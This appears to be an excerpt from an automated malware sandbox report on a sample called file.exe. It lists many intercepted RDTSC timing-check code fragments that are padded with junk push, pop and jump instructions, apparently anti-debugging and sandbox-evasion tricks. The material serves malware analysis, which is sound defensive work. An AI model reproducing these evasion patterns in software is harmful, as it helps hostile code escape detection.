                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B8A80 second address: 13B8AD9 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push eax 0x0000000d call 00007F0F04CBD318h 0x00000012 pop eax 0x00000013 mov dword ptr [esp+04h], eax 0x00000017 add dword ptr [esp+04h], 00000019h 0x0000001f inc eax 0x00000020 push eax 0x00000021 ret 0x00000022 pop eax 0x00000023 ret 0x00000024 sub dword ptr [ebp+122D322Bh], ecx 0x0000002a push 00000004h 0x0000002c mov edi, dword ptr [ebp+122D3904h] 0x00000032 nop 0x00000033 jmp 00007F0F04CBD31Eh 0x00000038 push eax 0x00000039 push eax 0x0000003a push edx 0x0000003b push ecx 0x0000003c jmp 00007F0F04CBD31Ch 0x00000041 pop ecx 0x00000042 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1403A4A second address: 1403A56 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1407A7E second address: 1407A82 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1407116 second address: 1407127 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b jg 00007F0F0527E406h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1407689 second address: 1407693 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007F0F04CBD316h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 140DC3A second address: 140DC64 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F0F0527E406h 0x00000008 jne 00007F0F0527E406h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F0F0527E418h 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 140DC64 second address: 140DC68 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 140DC68 second address: 140DC75 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push edi 0x0000000a pop edi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 140E77D second address: 140E781 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 140E781 second address: 140E785 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 140E785 second address: 140E790 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 140EA62 second address: 140EA66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 140EA66 second address: 140EA86 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F04CBD324h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jc 00007F0F04CBD318h 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 140EA86 second address: 140EA97 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0F0527E40Dh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 140ECEF second address: 140ECF6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 140F027 second address: 140F03C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jnp 00007F0F0527E406h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jnc 00007F0F0527E406h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 140F03C second address: 140F04B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 ja 00007F0F04CBD316h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 140F04B second address: 140F068 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F0F0527E413h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 140F312 second address: 140F320 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F04CBD31Ah 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 136DF27 second address: 136DF43 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0F0527E416h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 136DF43 second address: 136DF47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 136DF47 second address: 136DF4D instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 141942E second address: 1419434 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1419434 second address: 141943E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F0F0527E406h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1419721 second address: 1419740 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jl 00007F0F04CBD316h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c popad 0x0000000d jng 00007F0F04CBD328h 0x00000013 push edi 0x00000014 pushad 0x00000015 popad 0x00000016 push edi 0x00000017 pop edi 0x00000018 pop edi 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c popad 0x0000001d push edx 0x0000001e pop edx 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1419883 second address: 141988D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 141988D second address: 1419893 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1419893 second address: 14198A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F0F0527E406h 0x0000000a jne 00007F0F0527E406h 0x00000010 popad 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1419BC7 second address: 1419BCD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1419D1A second address: 1419D25 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 push edx 0x00000008 push ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1419FDD second address: 1419FE3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1419FE3 second address: 141A001 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 jno 00007F0F0527E406h 0x0000000e jmp 00007F0F0527E40Eh 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1420A1D second address: 1420A29 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F0F04CBD316h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1420A29 second address: 1420A2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1420A2E second address: 1420A3B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jg 00007F0F04CBD316h 0x00000009 push eax 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 141F870 second address: 141F875 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 141F875 second address: 141F891 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push edi 0x00000006 pop edi 0x00000007 push edi 0x00000008 pop edi 0x00000009 popad 0x0000000a pushad 0x0000000b jmp 00007F0F04CBD31Fh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 141F891 second address: 141F8A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F0F0527E406h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pushad 0x0000000e push esi 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 141F8A2 second address: 141F8BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop esi 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F0F04CBD31Eh 0x0000000e push edx 0x0000000f pop edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 141F8BB second address: 141F8E9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F0527E414h 0x00000007 jmp 00007F0F0527E413h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 142A2A6 second address: 142A2AA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14371F9 second address: 14371FD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14371FD second address: 143720D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jo 00007F0F04CBD316h 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 143720D second address: 1437216 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1437216 second address: 143723F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F0F04CBD316h 0x0000000a pushad 0x0000000b popad 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f jmp 00007F0F04CBD31Eh 0x00000014 popad 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 push edi 0x00000019 pop edi 0x0000001a jns 00007F0F04CBD316h 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 143723F second address: 143724A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 144192B second address: 144192F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 144192F second address: 144193D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 js 00007F0F0527E40Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 144193D second address: 1441941 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1449178 second address: 144917F instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push edx 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1452A35 second address: 1452A5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 jl 00007F0F04CBD316h 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F0F04CBD321h 0x00000014 jno 00007F0F04CBD316h 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1452A5B second address: 1452A7E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F0527E415h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jnp 00007F0F0527E406h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1452A7E second address: 1452A82 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1451232 second address: 145123A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1451404 second address: 1451420 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F0F04CBD31Ch 0x0000000d jnl 00007F0F04CBD318h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14517DA second address: 14517E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14517E3 second address: 14517FE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F04CBD327h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14517FE second address: 1451804 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1451804 second address: 145180A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 145180A second address: 145180E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 145180E second address: 145183F instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jbe 00007F0F04CBD318h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f jl 00007F0F04CBD31Eh 0x00000015 jp 00007F0F04CBD316h 0x0000001b push eax 0x0000001c pop eax 0x0000001d jbe 00007F0F04CBD31Ch 0x00000023 push eax 0x00000024 push edx 0x00000025 pushad 0x00000026 popad 0x00000027 pushad 0x00000028 popad 0x00000029 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14519C0 second address: 14519C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14519C4 second address: 14519C8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14519C8 second address: 14519CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14519CE second address: 1451A50 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F0F04CBD321h 0x00000008 jp 00007F0F04CBD316h 0x0000000e jng 00007F0F04CBD316h 0x00000014 jmp 00007F0F04CBD322h 0x00000019 popad 0x0000001a jng 00007F0F04CBD335h 0x00000020 pop edx 0x00000021 pop eax 0x00000022 push edx 0x00000023 jmp 00007F0F04CBD324h 0x00000028 push eax 0x00000029 push edx 0x0000002a jmp 00007F0F04CBD31Fh 0x0000002f push esi 0x00000030 pop esi 0x00000031 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1451A50 second address: 1451A56 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1452799 second address: 14527A1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14570C1 second address: 14570C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14570C6 second address: 14570E6 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F0F04CBD31Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jbe 00007F0F04CBD33Ah 0x00000010 jl 00007F0F04CBD31Eh 0x00000016 push ebx 0x00000017 pop ebx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 145A574 second address: 145A57E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F0F0527E406h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 145A57E second address: 145A587 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 145A587 second address: 145A590 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 popad 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 145A590 second address: 145A5A8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0F04CBD324h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1463C7D second address: 1463CAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 popad 0x00000008 jnp 00007F0F0527E42Eh 0x0000000e push edi 0x0000000f push eax 0x00000010 pop eax 0x00000011 push eax 0x00000012 pop eax 0x00000013 pop edi 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F0F0527E418h 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14695B8 second address: 14695BC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14695BC second address: 14695C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14695C6 second address: 14695CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14695CA second address: 14695CE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1477597 second address: 14775D9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jc 00007F0F04CBD316h 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f jmp 00007F0F04CBD326h 0x00000014 jmp 00007F0F04CBD325h 0x00000019 push eax 0x0000001a push edx 0x0000001b jne 00007F0F04CBD316h 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14841C1 second address: 14841C5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14841C5 second address: 14841CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14841CF second address: 14841F9 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F0F0527E40Dh 0x0000000d popad 0x0000000e je 00007F0F0527E43Bh 0x00000014 push eax 0x00000015 push edx 0x00000016 jo 00007F0F0527E406h 0x0000001c jnp 00007F0F0527E406h 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14841F9 second address: 14841FD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1487AEA second address: 1487AF2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1487AF2 second address: 1487B0D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0F04CBD326h 0x00000009 pop ecx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1487C6C second address: 1487C7E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F0F0527E40Ah 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1487DE8 second address: 1487E02 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F0F04CBD316h 0x0000000a ja 00007F0F04CBD318h 0x00000010 jns 00007F0F04CBD322h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1487E02 second address: 1487E12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F0F0527E406h 0x0000000a popad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1487E12 second address: 1487E18 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1487E18 second address: 1487E1C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1487E1C second address: 1487E2A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnl 00007F0F04CBD31Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1487F91 second address: 1487F9C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F0F0527E406h 0x0000000a pop ebx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1487F9C second address: 1487FB3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0F04CBD323h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14883E1 second address: 14883E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 148869E second address: 14886B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F0F04CBD316h 0x0000000a pop ecx 0x0000000b push esi 0x0000000c pushad 0x0000000d popad 0x0000000e jns 00007F0F04CBD316h 0x00000014 pop esi 0x00000015 rdtsc
